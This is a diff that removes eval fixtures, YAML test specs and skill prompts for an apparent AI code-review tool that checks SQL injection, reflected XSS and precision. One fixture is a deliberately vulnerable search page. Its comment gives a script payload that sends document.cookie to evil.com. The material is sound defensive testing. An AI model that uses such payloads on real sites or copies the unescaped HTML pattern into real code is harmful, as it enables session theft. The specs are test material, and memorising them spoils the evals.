const page = parseInt(parsed.searchParams.get('page') ?? '1', 10);
|
|
9
|
-
|
|
10
|
-
// Simulate search results
|
|
11
|
-
const results = performSearch(query, page);
|
|
12
|
-
|
|
13
|
-
// Bug: The query string from the URL is interpolated directly into HTML
|
|
14
|
-
// without escaping. An attacker can craft a URL like:
|
|
15
|
-
// /search?q=<script>document.location='http://evil.com/?c='+document.cookie</script>
|
|
16
|
-
// and the script will execute in the victim's browser.
|
|
17
|
-
return `
|
|
18
|
-
<!DOCTYPE html>
|
|
19
|
-
<html>
|
|
20
|
-
<head><title>Search Results</title></head>
|
|
21
|
-
<body>
|
|
22
|
-
<h1>Search Results</h1>
|
|
23
|
-
<p>Showing results for: <strong>${query}</strong></p>
|
|
24
|
-
<p>Page ${page} of ${results.totalPages}</p>
|
|
25
|
-
<ul>
|
|
26
|
-
${results.items.map((item) => `<li>${escapeHtml(item.title)}</li>`).join('\n')}
|
|
27
|
-
</ul>
|
|
28
|
-
</body>
|
|
29
|
-
</html>
|
|
30
|
-
`;
|
|
31
|
-
}
|
|
32
|
-
|
|
33
|
-
function escapeHtml(text: string): string {
|
|
34
|
-
return text
|
|
35
|
-
.replace(/&/g, '&')
|
|
36
|
-
.replace(/</g, '<')
|
|
37
|
-
.replace(/>/g, '>')
|
|
38
|
-
.replace(/"/g, '"');
|
|
39
|
-
}
|
|
40
|
-
|
|
41
|
-
interface SearchResult {
|
|
42
|
-
items: { title: string; url: string }[];
|
|
43
|
-
totalPages: number;
|
|
44
|
-
}
|
|
45
|
-
|
|
46
|
-
function performSearch(query: string, page: number): SearchResult {
|
|
47
|
-
// Stub implementation
|
|
48
|
-
return {
|
|
49
|
-
items: [
|
|
50
|
-
{ title: `Result for "${query}" - item 1`, url: '/result/1' },
|
|
51
|
-
{ title: `Result for "${query}" - item 2`, url: '/result/2' },
|
|
52
|
-
],
|
|
53
|
-
totalPages: Math.max(1, page),
|
|
54
|
-
};
|
|
55
|
-
}
|
package/evals/precision.yaml
DELETED
|
@@ -1,15 +0,0 @@
|
|
|
1
|
-
skill: skills/precision.md
|
|
2
|
-
|
|
3
|
-
evals:
|
|
4
|
-
- name: ignores-style-issues
|
|
5
|
-
given: functionally correct code with style issues (mixed naming conventions, verbose conditionals, magic numbers)
|
|
6
|
-
files:
|
|
7
|
-
- fixtures/ignores-style-issues/utils.ts
|
|
8
|
-
should_find:
|
|
9
|
-
- finding: "no bugs: the code is functionally correct despite having style issues, so zero or only info-level findings are expected"
|
|
10
|
-
required: false
|
|
11
|
-
should_not_find:
|
|
12
|
-
- inconsistent naming convention (snake_case vs camelCase)
|
|
13
|
-
- missing JSDoc comments
|
|
14
|
-
- verbose conditional that could be simplified
|
|
15
|
-
- magic numbers in discount calculation
|
|
@@ -1,24 +0,0 @@
|
|
|
1
|
-
skill: skills/security-scanning.md
|
|
2
|
-
|
|
3
|
-
evals:
|
|
4
|
-
- name: sql-injection
|
|
5
|
-
given: SQL query built via string interpolation with user-supplied search parameters
|
|
6
|
-
files:
|
|
7
|
-
- fixtures/sql-injection/api.ts
|
|
8
|
-
should_find:
|
|
9
|
-
- finding: "SQL injection: user input from params.name, params.email, and params.role is directly interpolated into SQL query without parameterization"
|
|
10
|
-
severity: critical
|
|
11
|
-
should_not_find:
|
|
12
|
-
- the getConnection helper implementation
|
|
13
|
-
- missing email format validation as the primary issue
|
|
14
|
-
|
|
15
|
-
- name: xss-reflected
|
|
16
|
-
given: HTML template that renders URL query parameter directly into page without escaping
|
|
17
|
-
files:
|
|
18
|
-
- fixtures/xss-reflected/server.ts
|
|
19
|
-
should_find:
|
|
20
|
-
- finding: "reflected XSS: the query parameter from the URL is interpolated into HTML via template literal without calling escapeHtml()"
|
|
21
|
-
severity: critical
|
|
22
|
-
should_not_find:
|
|
23
|
-
- hardcoded port number
|
|
24
|
-
- missing HTTPS as the primary issue
|
|
@@ -1,33 +0,0 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: eval-bug-detection
|
|
3
|
-
description: Test skill for bug detection evals. Finds logic errors, null handling bugs, async issues, and edge cases.
|
|
4
|
-
---
|
|
5
|
-
|
|
6
|
-
You are an expert bug hunter analyzing code changes.
|
|
7
|
-
|
|
8
|
-
## What to Report
|
|
9
|
-
|
|
10
|
-
Find bugs that will cause incorrect behavior at runtime:
|
|
11
|
-
|
|
12
|
-
- Null/undefined property access without guards
|
|
13
|
-
- Off-by-one and boundary errors
|
|
14
|
-
- Missing await on async operations
|
|
15
|
-
- Wrong comparison operators (< vs <=, && vs ||)
|
|
16
|
-
- Stale closures capturing outdated values
|
|
17
|
-
- Type coercion causing unexpected behavior
|
|
18
|
-
|
|
19
|
-
## What NOT to Report
|
|
20
|
-
|
|
21
|
-
- Style or formatting preferences
|
|
22
|
-
- Missing error handling that "might" matter
|
|
23
|
-
- Performance concerns (unless causing incorrect behavior)
|
|
24
|
-
- Unused variables or dead code
|
|
25
|
-
- Missing tests or documentation
|
|
26
|
-
- Security vulnerabilities (separate concern)
|
|
27
|
-
|
|
28
|
-
## Output Requirements
|
|
29
|
-
|
|
30
|
-
For each bug, provide:
|
|
31
|
-
- The exact file and line
|
|
32
|
-
- What incorrect behavior occurs
|
|
33
|
-
- What specific input or condition triggers it
|
|
@@ -1,18 +0,0 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: eval-precision
|
|
3
|
-
description: Test skill for precision evals. Only reports logic bugs, nothing else.
|
|
4
|
-
---
|
|
5
|
-
|
|
6
|
-
You are a strict bug detector. You ONLY report provable logic bugs.
|
|
7
|
-
|
|
8
|
-
## Rules
|
|
9
|
-
|
|
10
|
-
1. Only report bugs that WILL cause incorrect behavior
|
|
11
|
-
2. You must be able to construct a specific input that triggers failure
|
|
12
|
-
3. Do NOT report style, formatting, naming, or documentation issues
|
|
13
|
-
4. Do NOT report missing error handling
|
|
14
|
-
5. Do NOT report performance concerns
|
|
15
|
-
6. Do NOT report security vulnerabilities
|
|
16
|
-
7. If the code is correct, return an empty findings array
|
|
17
|
-
|
|
18
|
-
Be extremely conservative. When in doubt, do not report.
|